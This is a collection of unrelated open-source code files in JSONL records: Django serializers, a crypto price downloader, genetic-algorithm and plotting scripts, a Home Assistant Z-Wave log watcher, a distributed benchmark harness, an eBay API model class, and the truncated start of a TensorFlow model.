read_only=True)\n signs = SignSerializer(many=True, read_only=True)\n # clients = serializers.SlugRelatedField(\n # many=True,\n # slug_field='name',\n # queryset=models.Client.objects.all()\n # )\n clients = serializers.PrimaryKeyRelatedField(\n many=True,\n queryset=models.Client.objects.all(),\n help_text='id of each client',\n )\n\n class Meta:\n model = models.Contract\n fields = (\n 'id', 'title', 'date_begin', 'date_end', 'content',\n 'clients', 'status', 'author',\n 'countersigns', 'reviews', 'signs'\n )\n\n\nclass RegisterSerializer(serializers.Serializer):\n username = serializers.CharField(max_length=50, min_length=1)\n email = serializers.EmailField()\n password = serializers.CharField(max_length=50, min_length=6, write_only=True)\n\n def validate(self, data):\n if models.MyUser.objects.filter(username=data['username']).count() > 0:\n raise serializers.ValidationError('username already taken.')\n if models.MyUser.objects.filter(email=data['email']).count() > 0:\n raise serializers.ValidationError('email already taken.')\n return data\n\n def create(self, validated_data):\n user = models.MyUser.objects.create_user(\n validated_data['email'], validated_data['username'], validated_data['password'])\n return user\n\n\nclass MyUserSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.MyUser\n fields = (\n 'email', 'username', 'role', 'id',\n 'contracts_created', 'countersigns', 'reviews', 'signs',\n )\n # role = serializers.SlugRelatedField(\n # slug_field='name', queryset=models.Role.objects.all())\n role = serializers.PrimaryKeyRelatedField(queryset=models.Role.objects.all(), help_text='role id')\n contracts_created = ContractSerializer(many=True, read_only=True)\n countersigns = CountersignSerializer(many=True, read_only=True)\n reviews = ReivewSerializer(many=True, read_only=True)\n signs = SignSerializer(many=True, read_only=True)\n\n\nclass PwdSerializer(serializers.Serializer):\n password = serializers.CharField(\n min_length=6, max_length=50, write_only=True)\n","repo_name":"cp-shen/contract_management_rest","sub_path":"contract_app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74284621605","text":"import pandas as pd\r\nimport yfinance as yf\r\nfrom yahoofinancials import YahooFinancials\r\nfrom pandas_datareader import data as pdr\r\n\r\n#References\r\n#https://pypi.org/project/yahoofinancials/\r\n#https://pypi.org/project/yfinance/\r\n#https://www.analyticsvidhya.com/blog/2021/06/download-financial-dataset-using-yahoo-finance-in-python-a-complete-guide/\r\n\r\n#Get BTC-USD daily data from YahooFinance for specific dates\r\n# btc_df = yf.download('BTC-USD',\r\n# start='2019-01-01',\r\n# end='2022-02-20',\r\n# progress=False,\r\n# )\r\n# btc_df.head()\r\n\r\n#Or get BTC-USD daily data for all times\r\ndata = yf.download( # or pdr.get_data_yahoo(...\r\n # tickers list or string as well\r\n tickers = \"BTC-USD ETH-USD USDT-USD BNB-USD USDC-USD XRP-USD ADA-USD SHIB-USD\",\r\n\r\n # use \"period\" instead of start/end\r\n # valid periods: 1d,5d,1mo,3mo,6mo,1y,2y,5y,10y,ytd,max\r\n # (optional, default is '1mo')\r\n period = \"max\",\r\n\r\n # fetch data by interval (including intraday if period < 60 days)\r\n # valid intervals: 1m,2m,5m,15m,30m,60m,90m,1h,1d,5d,1wk,1mo,3mo\r\n # (optional, default is '1d')\r\n interval = \"1d\",\r\n\r\n start=\"2020-01-01\",\r\n\r\n end=\"2022-02-20\",\r\n\r\n # group by ticker (to access via data['SPY'])\r\n # (optional, default is 'column')\r\n group_by = 'ticker',\r\n\r\n # adjust all OHLC automatically\r\n # (optional, default is False)\r\n auto_adjust = True,\r\n\r\n # download pre/post regular market hours data\r\n # (optional, default is False)\r\n prepost = True,\r\n\r\n # use threads for mass downloading? (True/False/Integer)\r\n # (optional, default is True)\r\n threads = True,\r\n\r\n # proxy URL scheme use use when downloading?\r\n # (optional, default is None)\r\n proxy = None\r\n )\r\n\r\n# yf.pdr_override() # <== that's all it takes :-)\r\n# data = pdr.get_data_yahoo(\"BTC-USD ETH-USD USDT-USD BNB-USD USDC-USD XRP-USD ADA-USD SHIB-USD\", start=\"2020-01-01\", end=\"2022-02-20\")\r\n\r\nprint (data)\r\ndata.to_csv('yahoo_data.csv')\r\n# data.to_csv (r'export_dataframe.csv', index = False, header=True)\r\n\r\n","repo_name":"ldtcooper/crypto-arbitrage","sub_path":"data_collection.py","file_name":"data_collection.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"15030817360","text":"import random\nimport network\nfrom keras import models\nfrom keras import layers\nfrom utils import Weights\n\ndef get_partner(partner_1, num_networks):\n allowed_partners = list(range(num_networks))\n allowed_partners.remove(partner_1)\n partner_2 = random.randint(0, len(allowed_partners))\n \n return partner_2\n\n\ndef crossingover(model1, model2):\n result = []\n\n for layer_idx in range(len(model1.layers)):\n m1_weights = Weights(model1.layers[layer_idx])\n m2_weights = Weights(model2.layers[layer_idx])\n m1_weights_list = m1_weights.get_weights_list()\n m2_weights_list = m2_weights.get_weights_list()\n \n if len(m1_weights_list) == 0:\n continue\n \n separate_idx = random.randint(0, len(m1_weights_list) - 1)\n for weight_idx in range(0, separate_idx):\n result.append(m1_weights_list[weight_idx])\n for weight_idx in range(separate_idx, len(m1_weights_list)):\n result.append(m2_weights_list[weight_idx])\n \n return result\n\n\ndef mutation(weights, num_weights, mutation_value):\n idx = random.sample(range(len(weights) - 1), num_weights)\n \n for i in idx:\n direction = random.randint(0, 1)\n if direction == 0:\n weights[i] -= mutation_value\n else:\n weights[i] += mutation_value\n\n\ndef selection(num_networks, rewards, num_selected, num_random, num_new_random, tesnsor_size):\n result = []\n nn_name_tmpl = 'nn{}.h5'\n\n for i in range(num_selected - num_random - num_new_random):\n best_network_idx = rewards.index(max(rewards))\n nn = models.load_model(nn_name_tmpl.format(best_network_idx))\n nn.save(nn_name_tmpl.format(i))\n rewards[best_network_idx] = 0\n\n for i in range(num_random):\n random_idx = random.randint(0, num_networks - 1)\n nn = models.load_model(nn_name_tmpl.format(random_idx))\n nn.save(nn_name_tmpl.format(num_selected - num_random - num_new_random + i))\n\n for i in range(num_new_random):\n new_model = network.generate_model(tesnsor_size)\n nn.save(nn_name_tmpl.format(num_selected - num_new_random + i))\n\n return result\n\n\ndef generate_child(model1, model2, tesnsor_size, layers_info, cfg):\n child_weights = crossingover(model1, model2)\n mutation(child_weights, cfg.NUM_MUTATION_WEIGHTS, cfg.MUTATION_FACTOR)\n child_model = network.generate_model(tesnsor_size)\n \n for layer_idx in range(len(child_model.layers)):\n weights_mtrx = layers_info[layer_idx].get_weights_mtrx(\n child_weights[:layers_info[layer_idx].size()])\n child_model.layers[layer_idx].set_weights(weights_mtrx)\n child_weights = child_weights[layers_info[layer_idx].size():]\n \n return child_model","repo_name":"megagnom37/NN_GA","sub_path":"cart_pole_release/geneticalg.py","file_name":"geneticalg.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10808571838","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nx=np.linspace(-3,3,50)\r\ny1=x**2\r\ny2=2*x+1\r\nplt.figure()\r\n##坐标轴进行备注\r\nplt.xlim((-1,2))\r\nticks=np.linspace(-1,2,5)\r\nplt.xticks(ticks)\r\nplt.yticks([-6,-4,-1.5,2,8],['really bad','bad','normal','good','really good'])\r\nplt.xlabel('yang')\r\nplt.ylabel('yang2')\r\n##坐标轴调整\r\nax=plt.gca()\r\nax.spines['top'].set_color('none')\r\nax.spines['right'].set_color('none')\r\nax.xaxis.set_ticks_position('bottom')\r\nax.spines['bottom'].set_position(('data',0))\r\nax.spines['left'].set_position(('data',0))\r\n\r\nplt.plot(x,y1,color='red',linestyle='--',label='yang1')\r\nplt.plot(x,y2,label='yang2')\r\nplt.legend(labels=['quxian','zhixian'],loc='best')##legend线名称\r\n##annotate标注\r\nx0=1.25\r\ny0=2*x0+1\r\nplt.scatter(x0,y0,s=50)\r\nplt.plot([x0,x0],[y0,0],'k--',linewidth=2)\r\nplt.annotate(r'2x+1=%s'%y0,xy=(x0,y0),xycoords='data',xytext=(+30,-30),\r\n textcoords='offset points',fontsize=10,\r\n arrowprops=dict(arrowstyle='->',connectionstyle=\"arc3,rad=.2\"))\r\nplt.show()","repo_name":"yhjflower/numpy","sub_path":"matplt.py","file_name":"matplt.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13097737635","text":"from sys import stdin\n\n\ndef solution(N, items):\n items.sort()\n\n if 0 <= items[0] <= items[-1]:\n return items[0], items[1], items[2]\n if items[0] <= items[-1] <= 0:\n return items[-3], items[-2], items[-1]\n\n best = float('inf')\n best_combo = None\n for middle in range(1, N-1):\n left, right = middle-1, middle+1\n while True:\n # print(left, middle, right)\n v = items[left] + items[middle] + items[right]\n if abs(v) < best:\n best = abs(v)\n best_combo = items[left], items[middle], items[right]\n if v == 0:\n break\n if v < 0:\n right += 1\n if v > 0:\n left -= 1\n if left < 0 or right >= N:\n break\n if best == 0:\n break\n return best_combo\n\n\nN = int(stdin.readline())\nitems = [int(c) for c in stdin.readline().strip().split(' ')]\nprint(' '.join(str(i) for i in solution(N, items)))\n\n\n# import random\n# from itertools import combinations\n#\n# def dum(N, items):\n# best = float('inf')\n# comb = None\n# for i in combinations(items, 3):\n# if abs(sum(i)) < best:\n# best = abs(sum(i))\n# comb = i\n# return comb\n#\n# while True:\n# print('__________________________________')\n# items = [random.randint(-20, 20) for _ in range(10)]\n# items.sort()\n# print(items)\n# a, b = solution(len(items), items), dum(len(items), items)\n# print(a, b)\n# print(sum(a), sum(b))\n# if abs(sum(a)) != abs(sum(b)):\n# break\n# print(dum(len(items), items))\n# \"\"\"\n# 5\n# -5 -2 -1 4 98\n# 8\n# -10 -5 -2 -1 6 7 8 8\n# \"\"\"\n","repo_name":"grasshopperTrainer/coding_practice","sub_path":"baekjoon/accepted/투 포인터/2473 세 용액.py","file_name":"2473 세 용액.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74292149284","text":"import sys,math\ninput=sys.stdin.readline\n\nn=int(input())\nres=math.factorial(n)\ncount=0\nfor i in str(res)[::-1]: #역순으로 배열\n if i != '0':\n break\n count +=1\nprint(count)","repo_name":"MaiBoii/Algorithm_Study","sub_path":"동적할당법/11724.py","file_name":"11724.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18668192320","text":"#!/usr/bin/env python3\n# \\author fms13\n# \\date April 30, 2020\n#\n# \\brief Opens a file and tries a number of matching lines in a row\n#\n# Under development, not working currently.\n#\n# The script is looking for the first and the last of these three lines as an example:\n# Node004, Received a MultiChannelEncap from node 4, endpoint 1\n# Node004, Received SwitchBinary report from node 4: level=On\n# Node004, Refreshed Value: old value=true, new value=true, type=bool\n#\n# The node number and the endpoints to be checked can be configured.\n\nimport sys\nimport time\nimport argparse\nimport pycurl\nimport json\nimport io\n\nfrom watchdog.events import FileSystemEventHandler\nfrom watchdog.observers import Observer\n\nimport collections\n\n# search line:\nnode_enpoint_numbers = [ [ 4, [1, 2] ] ]\nsearch_strings_1 = []\n\n# the Home Assistant authentication token, to be obtained from\nhome_assistant_authentication_token = \"\"\n\n# ip and port of Home Assistant instance, e.g. 192.168.0.10:8123\nhome_assistant_ip_port = \"\"\n\nif __name__ == \"__main__\":\n\n# parser = argparse.ArgumentParser()\n# parser.add_argument(\"home_assistant_url\", type=str, help=\"the URL of the Home Assistant instance to call in case an override was detected\")\n\n # directory where file is:\n path = '/home/homeassistant/.homeassistant/'\n path = './'\n file_name = \"OZW_Log.txt\"\n path_and_file_name = path + file_name\n\n # open file\n f = open(path_and_file_name, 'r')\n\n # go to the end of the file:\n f.seek(0, 2)\n\n print(\"checking for these nodes and endpoints \")\n for node in node_enpoint_numbers:\n for endpoint in node[1]:\n print(f\"Node{node[0]:03d}, endpoint {endpoint}\")\n\n # create the strings wer're searching for in step 1:\n print(\"search strings for step 1:\")\n for node in node_enpoint_numbers:\n search_strings_1.append(f\"Node{node[0]:03d}, Refreshed Value: old value=false, new value=true, type=bool\")\n print(search_strings_1[-1])\n\n # create a list of strings to store the last three lines of the file:\n lines = collections.deque(maxlen=3)\n\n my_event_handler = FileSystemEventHandler()\n\n def on_modified(event):\n #print(f\"{event.src_path} has been modified\")\n if event.src_path == path_and_file_name:\n print(\"new Z-Wave messages\")\n\n while True:\n buf = f.readline()\n #print(\"buf: \", buf)\n if not buf:\n break\n\n lines.append(buf)\n\n # check if one of the search strings is in the last line:\n for idx, search_string in enumerate(search_strings_1):\n #print(f\"searching for {search_string} in {buf}\")\n if lines[-1].find(search_string) != -1:\n #print(\"found search string 1: \", buf)\n # check for endpoints in lines that came in two lines before:\n for endpoint in node_enpoint_numbers[idx][1]:\n node = node_enpoint_numbers[idx][0]\n search_string_2 = f\"Node{node:03d}, Received a MultiChannelEncap from node {node}, endpoint {endpoint}\"\n #print(f\"step 2: searching for {search_string_2} in {lines[-3]}\")\n if lines[-3].find(search_string_2) != -1:\n print(\"found search string 2 in: \", lines[-3])\n\n # using pycurl for this curl POST request:\n # #print(f\"calling /usr/bin/curl -X POST -H \\\"Authorization: Bearer {home_assistant_authentication_token}\\\" -H \\\"Content-Type: application/json\\\" -d \\'{{\\\"state\\\": \\\"on\\\"}}\\' http://{home_assistant_ip_port}/api/states/input_boolean.override_node{node}_endpoint{endpoint}\")\n pycurl_connect = pycurl.Curl()\n pycurl_connect.setopt(pycurl.URL, f\"http://{home_assistant_ip_port}/api/states/input_boolean.override_node{node}_endpoint{endpoint}\")\n pycurl_connect.setopt(pycurl.HTTPHEADER, [f'Authorization: Bearer {home_assistant_authentication_token}',\n 'Content-Type: application/json'])\n pycurl_connect.setopt(pycurl.POST, 1)\n data = json.dumps({\"state\": \"on\"})\n data_as_file_object = io.StringIO(data)\n pycurl_connect.setopt(pycurl.READDATA, data_as_file_object)\n pycurl_connect.setopt(pycurl.POSTFIELDSIZE, len(data))\n pycurl_connect.perform()\n\n print(\"done.\")\n\n my_event_handler.on_modified = on_modified\n\n my_observer = Observer()\n my_observer.schedule(my_event_handler, path, recursive=False)\n\n print(\"Starting observer\")\n my_observer.start()\n\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n my_observer.stop()\n my_observer.join()\n\n\n f.close()","repo_name":"fms13/mc-control","sub_path":"home-assistant/detect-event-in-OZW_Log.py","file_name":"detect-event-in-OZW_Log.py","file_ext":"py","file_size_in_byte":5084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27677909026","text":"import subprocess\nimport os\nimport datetime\nimport time\nfrom bench_util import *\nfrom bench import *\n\nPROJECT_ABS_PATH = PROJECT_PATH\n\n\nclass BaseRun:\n def __init__(self, exp_id) -> None:\n self.exp_id = exp_id\n\n def run(self,):\n raise NotImplementedError\n\n\nclass Experiment:\n registered_id = []\n\n def __init__(self, exp_id) -> None:\n if exp_id not in self.registered_id:\n self.registered_id.append(exp_id)\n else:\n raise Exception(\"repeated exp ID\")\n\n self.exp_id = exp_id\n self.log_dir = None\n pass\n\n def _BeforeStartAllRun(self, ) -> None:\n raise NotImplementedError\n\n def _SortRuns(self, runs):\n raise NotImplementedError\n\n def _RunHook(self, previous_run, next_run):\n raise NotImplementedError\n\n def _AllRuns(self,):\n raise NotImplementedError\n\n def SetLogDir(self, log_dir):\n self.log_dir = log_dir\n\n def RunExperiment(self):\n if self.log_dir is None:\n raise Exception(\"invalid log dir\")\n os.makedirs(self.log_dir, exist_ok=True)\n self._BeforeStartAllRun()\n all_configs = self._AllRuns()\n all_configs = self._SortRuns(all_configs)\n print(\"len of all configs = \", len(all_configs))\n previous_run = None\n for each_i, each_run in enumerate(all_configs):\n self._RunHook(previous_run, each_run)\n print(datetime.datetime.now(),\n f'EXP{self.exp_id}: {each_i} / {len(all_configs)}', flush=True)\n each_run.run()\n previous_run = each_run\n\n self._RunHook(previous_run, None)\n\n\nclass CSRun(BaseRun):\n def __init__(self, ps_servers, client_servers,\n exp_id, run_id, log_dir,\n server_config, client_config,\n server_bin_path, client_bin_path\n ) -> None:\n super().__init__(exp_id)\n self.run_id = run_id\n self.log_dir = log_dir\n self.server_config = server_config\n self.client_config = client_config\n self.ps_servers = ps_servers\n self.client_servers = client_servers\n self.server_bin_path = server_bin_path\n self.client_bin_path = client_bin_path\n self.check_config()\n\n def check_config(self,):\n if len(self.ps_servers) == 0 or len(self.client_servers) == 0:\n raise Exception(\"no machines\")\n\n # wait a condition to start client processes\n def _ClientWaitServer(self):\n raise NotImplementedError\n\n def run(self, ):\n os.makedirs(self.log_dir, exist_ok=True)\n print(f\"mkdir {self.log_dir}\")\n time.sleep(1)\n # dump config\n dumped_config = {\n \"server\":\n self.server_config,\n \"client\": self.client_config,\n }\n dir_path = os.path.dirname(os.path.realpath(__file__))\n\n subprocess.run(\n f\"bash {dir_path}/../third_party/Mayfly-main/script/restartMemc.sh\", shell=True, check=True)\n \n global_id = 0\n for ps_id, (each_host, numa_id) in enumerate(self.ps_servers):\n config = ' '.join(\n [f'--{k}={v}' for k, v in self.server_config.items()])\n server_command = f'''{self.server_bin_path} --numa_id={numa_id} --global_id={global_id} \\\n --num_server_processes={len(self.ps_servers)} --num_client_processes={len(self.client_servers)} \\\n {config} >{self.log_dir}/ps_{ps_id} 2>&1'''\n RemoteExecute(each_host, server_command, PROJECT_ABS_PATH)\n dumped_config[f'server_{ps_id}'] = server_command\n global_id += 1\n\n self._ClientWaitServer()\n\n for client_id, (each_host, numa_id) in enumerate(self.client_servers):\n config = ' '.join(\n [f'--{k}={v}' for k, v in self.client_config.items()])\n client_command = f'''{self.client_bin_path} --numa_id={numa_id} --global_id={global_id} \\\n --num_server_processes={len(self.ps_servers)} --num_client_processes={len(self.client_servers)} \\\n {config} >{self.log_dir}/client_{client_id} 2>&1'''\n RemoteExecute(each_host, client_command, PROJECT_ABS_PATH)\n dumped_config[f'client_{ps_id}'] = client_command\n global_id += 1\n\n with open(f'{self.log_dir}/config', 'w') as f:\n import json\n json.dump(dumped_config, f, indent=2)\n\n\nclass CSExperiment(Experiment):\n def __init__(self, exp_id, common_config, server_config, client_config, ps_servers, client_servers) -> None:\n super().__init__(exp_id)\n self.common_config = common_config\n self.server_config = server_config\n self.client_config = client_config\n self.ps_servers = ps_servers\n self.client_servers = client_servers\n\n def _AllRuns(self,):\n return list(self.get_next_config())\n\n def _PostprocessConfig(self, server_configs, client_configs):\n # don't use self\n raise NotImplementedError\n\n def _CreateRun(self, run_id, run_log_dir, run_server_config, run_client_config,):\n raise NotImplementedError\n\n def get_next_config(self, ):\n common_config = PreprocessConfig(self.common_config)\n server_config = PreprocessConfig(self.server_config)\n client_config = PreprocessConfig(self.client_config)\n\n # [(dictA, dictB), (dictA, dictB), (dictA, dictB),]\n print(\"server_config has \", len(server_config), \"configs\")\n print(\"client_config has \", len(client_config), \"configs\")\n\n def find_start_run_id():\n import re\n ids = [int(re.search(r'(\\d+)', each)[1])\n for each in os.listdir(self.log_dir)]\n if len(ids) != 0:\n max_id = max(ids)\n if len(ids) == 0:\n max_id = -1\n print(os.listdir(self.log_dir))\n return max_id + 1\n\n run_id = find_start_run_id()\n print(f\"-------start run_id ={run_id} ====================\")\n runs = []\n for each_common_config in common_config:\n for each_server_config in server_config:\n for each_client_config in client_config:\n each_server_config_copy = each_server_config.copy()\n each_client_config_copy = each_client_config.copy()\n each_server_config_copy.update(each_common_config)\n each_client_config_copy.update(each_common_config)\n # add custom process\n self._PostprocessConfig(\n each_server_config_copy, each_client_config_copy)\n\n runs.append(self._CreateRun(run_id, os.path.join(\n self.log_dir, f'run_{run_id}'), each_server_config_copy, each_client_config_copy))\n run_id += 1\n for each in runs:\n yield each\n","repo_name":"thustorage/PetPS","sub_path":"benchmark/bench_base.py","file_name":"bench_base.py","file_ext":"py","file_size_in_byte":6898,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"14710930616","text":"# coding: utf-8\n\n\"\"\"\n Seller Service Metrics API \n\n The Analytics API provides data and information about a seller and their eBay business. The resources and methods in this API let sellers review information on their listing performance, metrics on their customer service performance, and details on their eBay seller performance rating. The three resources in the Analytics API provide the following data and information: Customer Service Metric – Returns data on a seller's customer service performance as compared to other seller's in the same peer group. Traffic Report – Returns data that shows how buyers are engaging with a seller's listings. Seller Standards Profile – Returns data pertaining to a seller's performance rating. Sellers can use the data and information returned by the various Analytics API methods to determine where they can make improvements to increase sales and how they might improve their seller status as viewed by eBay buyers. For details on using this API, see Analyzing seller performance.\n\n OpenAPI spec version: 1.2.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nfrom pprint import pformat\nfrom six import iteritems\nimport re\n\n\nclass StandardsProfile(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n def __init__(self, cycle=None, default_program=None, evaluation_reason=None, metrics=None, program=None, standards_level=None):\n \"\"\"\n StandardsProfile - a model defined in Swagger\n\n :param dict swaggerTypes: The key is attribute name\n and the value is attribute type.\n :param dict attributeMap: The key is attribute name\n and the value is json key in definition.\n \"\"\"\n self.swagger_types = {\n 'cycle': 'Cycle',\n 'default_program': 'bool',\n 'evaluation_reason': 'str',\n 'metrics': 'list[Metric]',\n 'program': 'str',\n 'standards_level': 'str'\n }\n\n self.attribute_map = {\n 'cycle': 'cycle',\n 'default_program': 'defaultProgram',\n 'evaluation_reason': 'evaluationReason',\n 'metrics': 'metrics',\n 'program': 'program',\n 'standards_level': 'standardsLevel'\n }\n\n self._cycle = cycle\n self._default_program = default_program\n self._evaluation_reason = evaluation_reason\n self._metrics = metrics\n self._program = program\n self._standards_level = standards_level\n\n @property\n def cycle(self):\n \"\"\"\n Gets the cycle of this StandardsProfile.\n\n\n :return: The cycle of this StandardsProfile.\n :rtype: Cycle\n \"\"\"\n return self._cycle\n\n @cycle.setter\n def cycle(self, cycle):\n \"\"\"\n Sets the cycle of this StandardsProfile.\n\n\n :param cycle: The cycle of this StandardsProfile.\n :type: Cycle\n \"\"\"\n\n self._cycle = cycle\n\n @property\n def default_program(self):\n \"\"\"\n Gets the default_program of this StandardsProfile.\n If set to true, this flag indicates this is the default program for the seller. Except for sellers in China, a seller's default program is the marketplace where they registered with eBay. Seller's in China select their default program when they register.\n\n :return: The default_program of this StandardsProfile.\n :rtype: bool\n \"\"\"\n return self._default_program\n\n @default_program.setter\n def default_program(self, default_program):\n \"\"\"\n Sets the default_program of this StandardsProfile.\n If set to true, this flag indicates this is the default program for the seller. Except for sellers in China, a seller's default program is the marketplace where they registered with eBay. Seller's in China select their default program when they register.\n\n :param default_program: The default_program of this StandardsProfile.\n :type: bool\n \"\"\"\n\n self._default_program = default_program\n\n @property\n def evaluation_reason(self):\n \"\"\"\n Gets the evaluation_reason of this StandardsProfile.\n Specifies how the overall seller level was calculated. In the event of special circumstances (as determined by eBay), eBay may override the calculated seller level. In general, such overrides protect a seller's level. The usual value for both cycle types is "Seller level generated by standards monthly evaluation cycle."\n\n :return: The evaluation_reason of this StandardsProfile.\n :rtype: str\n \"\"\"\n return self._evaluation_reason\n\n @evaluation_reason.setter\n def evaluation_reason(self, evaluation_reason):\n \"\"\"\n Sets the evaluation_reason of this StandardsProfile.\n Specifies how the overall seller level was calculated. In the event of special circumstances (as determined by eBay), eBay may override the calculated seller level. In general, such overrides protect a seller's level. The usual value for both cycle types is "Seller level generated by standards monthly evaluation cycle."\n\n :param evaluation_reason: The evaluation_reason of this StandardsProfile.\n :type: str\n \"\"\"\n\n self._evaluation_reason = evaluation_reason\n\n @property\n def metrics(self):\n \"\"\"\n Gets the metrics of this StandardsProfile.\n A list of the metrics upon which a seller's profile is evaluated. Each program's applicable metrics and requirements are listed at eBay Top Rated seller program standards.\n\n :return: The metrics of this StandardsProfile.\n :rtype: list[Metric]\n \"\"\"\n return self._metrics\n\n @metrics.setter\n def metrics(self, metrics):\n \"\"\"\n Sets the metrics of this StandardsProfile.\n A list of the metrics upon which a seller's profile is evaluated. Each program's applicable metrics and requirements are listed at eBay Top Rated seller program standards.\n\n :param metrics: The metrics of this StandardsProfile.\n :type: list[Metric]\n \"\"\"\n\n self._metrics = metrics\n\n @property\n def program(self):\n \"\"\"\n Gets the program of this StandardsProfile.\n Indicates the program used to generate the profile data. Values can be PROGRAM_DE, PROGRAM_UK, PROGRAM_US, or PROGRAM_GLOBAL. For implementation help, refer to eBay API documentation\n\n :return: The program of this StandardsProfile.\n :rtype: str\n \"\"\"\n return self._program\n\n @program.setter\n def program(self, program):\n \"\"\"\n Sets the program of this StandardsProfile.\n Indicates the program used to generate the profile data. Values can be PROGRAM_DE, PROGRAM_UK, PROGRAM_US, or PROGRAM_GLOBAL. For implementation help, refer to eBay API documentation\n\n :param program: The program of this StandardsProfile.\n :type: str\n \"\"\"\n\n self._program = program\n\n @property\n def standards_level(self):\n \"\"\"\n Gets the standards_level of this StandardsProfile.\n The overall standards level of the seller, one of TOP_RATED, ABOVE_STANDARD, or BELOW_STANDARD. For implementation help, refer to eBay API documentation\n\n :return: The standards_level of this StandardsProfile.\n :rtype: str\n \"\"\"\n return self._standards_level\n\n @standards_level.setter\n def standards_level(self, standards_level):\n \"\"\"\n Sets the standards_level of this StandardsProfile.\n The overall standards level of the seller, one of TOP_RATED, ABOVE_STANDARD, or BELOW_STANDARD. For implementation help, refer to eBay API documentation\n\n :param standards_level: The standards_level of this StandardsProfile.\n :type: str\n \"\"\"\n\n self._standards_level = standards_level\n\n def to_dict(self):\n \"\"\"\n Returns the model properties as a dict\n \"\"\"\n result = {}\n\n for attr, _ in iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"\n Returns the string representation of the model\n \"\"\"\n return pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"\n For `print` and `pprint`\n \"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"\n Returns true if both objects are equal\n \"\"\"\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"\n Returns true if both objects are not equal\n \"\"\"\n return not self == other\n","repo_name":"Hatraco-GmbH/ebay","sub_path":"analytics/ebayanalytics/models/standards_profile.py","file_name":"standards_profile.py","file_ext":"py","file_size_in_byte":10300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34662518156","text":"import tensorflow as tf\nfrom symnet3.unet import GATConvLayer, GATConvLayerDistance\nfrom symnet3.action_decoder import ActionDecoder\nimport numpy as np\nimport pdb\nuse_self_loops_in_all_adj = True\nremove_attn = False\n\nsymnet_params = {\"channels\", \"num_postprocess\", \"num_preprocess\", \"attn_heads\", \"dropout_rate\", \"activation\", \"conv_type\", \"num_edge_types\", \"use_shared_gat\"}\ngat_params = {\"channels\", \"attn_heads\", \"dropout_rate\", \"activation\", \"conv_type\", \"num_edge_types\", \"use_shared_gat\"}\n\nclass SymNet3(tf.keras.Model):\n def __init__(self, general_params, se_params, ad_params, ge_params, tm_params, env_instance_wrapper=None):\n\n super(SymNet3, self).__init__()\n\n self.general_params = general_params\n self.se_params = se_params\n self.ad_params = ad_params\n self.ge_params = ge_params\n self.tm_params = tm_params\n self.tfm_params = self.ge_params[\"tfm_params\"]\n\n self.out_deg = self.general_params[\"add_out_deg\"]\n self.in_deg = self.general_params[\"add_in_deg\"]\n self.bet_cen = self.general_params[\"add_bet_cen\"]\n self.dist_leaves = self.general_params[\"add_dist_leaves\"]\n self.use_bidir_edges = self.general_params[\"use_bidir_edges\"]\n self.make_grid = self.general_params[\"make_grid\"]\n\n self.use_distance_mat = se_params[\"use_distance_mat\"]\n self.se_type = self.se_params[\"type\"]\n self.se_count = self.se_params[\"num_se\"]\n self.se_params[\"num_edge_types\"] = None\n self.use_edge_types = se_params[\"use_edge_types\"]\n self.preprocess_gat = se_params[\"use_preprocess_layer\"]\n\n if self.use_distance_mat:\n arg_dict = dict((k, self.se_params[k]) for k in gat_params)\n arg_dict[\"num_edge_types\"] = 1 # len(env_instance_wrapper.envs[0].instance_parser.dbn_edge_types_to_idx)\n arg_dict[\"filter_size\"] = 1\n arg_dict[\"concat_last_gat\"] = False\n arg_dict[\"attn_heads\"] = se_params[\"num_dist_attn_heads\"]\n arg_dict[\"return_attn_coef\"] = True\n self.gat_distance_mat = GATConvLayerDistance(**arg_dict)\n print(\"Built gat_distance_mat\")\n\n if self.use_edge_types:\n self.se_params[\"num_edge_types\"] = self.se_params[\"num_se\"]\n \n if self.preprocess_gat:\n self.se_list_preprocess = self.get_state_encoder(self.se_params[\"num_preprocess\"], env_instance_wrapper)\n self.se_list_postprocess = self.get_state_encoder(self.se_params[\"num_postprocess\"], 